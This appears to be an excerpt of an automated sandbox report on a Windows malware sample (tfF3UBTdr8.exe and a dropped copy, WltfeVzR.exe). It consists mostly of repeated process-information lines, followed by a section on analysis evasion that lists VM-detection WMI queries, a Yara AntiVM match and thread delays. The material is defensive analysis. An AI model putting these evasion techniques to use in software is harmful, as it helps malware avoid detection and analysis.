                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: 7E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: 8E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: 8FB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: 9FB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: 17D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: 3290000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: 1870000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory allocated: 2DE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory allocated: 3040000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory allocated: 2E60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory allocated: 78F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory allocated: 73F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory allocated: 88F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory allocated: 98F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory allocated: 12C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory allocated: 2D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory allocated: 12C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 353Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5852Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5630Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWindow / User API: threadDelayed 3338Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWindow / User API: threadDelayed 2634Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWindow / User API: threadDelayed 1329
